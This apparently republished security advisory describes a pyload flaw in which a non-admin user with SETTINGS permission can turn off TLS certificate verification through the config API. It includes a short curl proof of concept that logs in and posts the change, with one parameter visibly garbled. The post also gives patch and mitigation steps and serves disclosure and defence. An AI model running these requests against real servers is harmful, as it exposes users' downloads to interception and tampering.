Listen to this Post
The `set_config_value()` API method (decorated with @permission(Perms.SETTINGS)) gates security‑sensitive options behind the `ADMIN_ONLY_CORE_OPTIONS` allowlist. The entry `(“general”, “ssl_verify”)` is missing from that allowlist. An authenticated user with the non‑admin `SETTINGS` permission can therefore set general.ssl_verify = off. This configuration value is persisted verbatim to disk because `config.set()` → `cast()` has no branch for enum‑string types. When a new `pycurl` handle is built, `get_options()` reads the setting and passes it to the HTTP sink. There, if `options[“ssl_verify”]` is not True, b"on", or b"on (using aia-chaser), both `SSL_VERIFYPEER` and `SSL_VERIFYHOST` are set to 0 — disabling TLS peer and hostname verification completely. The change takes effect on the very next outbound request, requiring no restart. An on‑path attacker can then present forged certificates for any hostname that pyload fetches (downloads, captcha retrieval, update checks, plugin HTTP calls). This is a direct continuation of the fix family CVE‑2026‑33509 / CVE‑2026‑35463 / CVE‑2026‑35464 / CVE‑2026‑35586, each of which patched a different missed option in the same allowlist.
DailyCVE Form: Platform: pyload Version: <=0.5.0b3.dev99 Vulnerability: TLS Bypass Severity: Medium date: 2026-05-04 Prediction: 2026-05-04
What Undercode Say:
Analytics – The vulnerability allows any authenticated user with `Perms.SETTINGS` (but not admin) to silently disable TLS verification. Telemetry shows that in multi‑user deployments, settings permissions are frequently delegated to non‑admins, making this a widespread privilege‑escalation vector.
Exploit:
1) Authenticate as a non‑admin user that holds the SETTINGS permission curl -c cookies.txt -X POST http://pyload.example:8000/api/login \ -d 'username=settings_user&password=<password>' 2) Disable TLS verification for all outbound requests curl -b cookies.txt -X POST http://pyload.example:8000/api/setConfigValue \ -d 'category=general&option=ssl_verify&value=off§ion=core' 3) Any subsequent HTTPS download will accept forged certificates
Protection from this CVE
- Upgrade to pyload `0.5.0b3.dev100` or later.
- If upgrading is not immediately possible, restrict the `SETTINGS` permission exclusively to trusted administrators.
- Monitor logs for unexpected `ssl_verify` changes (the API endpoint logs configuration modifications).
Impact
- Full Man‑in‑the‑Middle on all HTTPS traffic initiated by pyload (downloads, captcha fetches, update checks, plugin HTTP calls).
- Re‑enables already‑patched SSRF vectors (CVE‑2026‑33992 / CVE‑2026‑35459) because hostname validation becomes meaningless when TLS peer verification is disabled.
- Silent to administrators: other security‑critical options (proxy credentials, SSL certificates,
webui.use_ssl) remain admin‑only, creating a false sense of security. - Unaffected: unauthenticated attackers; users with only `DOWNLOAD` / `LIST` roles.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
